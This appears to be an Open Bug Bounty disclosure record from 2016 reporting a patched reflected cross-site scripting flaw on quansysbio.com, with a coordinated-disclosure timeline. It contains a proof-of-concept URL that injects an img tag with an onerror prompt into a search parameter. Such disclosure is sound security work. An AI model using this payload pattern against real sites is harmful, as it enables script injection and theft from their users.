quansysbio.com XSS vulnerability

2016-08-12T15:32:00
ID OBB:173718
Type openbugbounty
Reporter ShivprasadSambhare
Modified 2016-11-04T17:15:00

Description

Vulnerable URL:
http://www.quansysbio.com/alsearch/?co=q&vi;=1&ty;=0&am;=12&tf;=s5eng2&rc;=7&of;=0&ln;=255&ar;=0&mnxs;_dom=http%3A%2F%2Fwww.quansysbio.com%2F|&al;=0&sn;=www.quansysbio.com&dn;=com&st;=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E%22
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1531829
VIP website status:| No
Check quansysbio.com SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 12 August, 2016 15:32 GMT
Vulnerability existence verified and confirmed| 12 August, 2016 17:13 GMT
Generic security notifications sent to website owner| 12 August, 2016 17:13 GMT
Customized security notification sent to website owner| 12 August, 2016 17:13 GMT
Notification sent to subscribers (without technical details)| 12 August, 2016 18:17 GMT
Vulnerability details disclosed by researcher| 4 November, 2016 17:15 GMT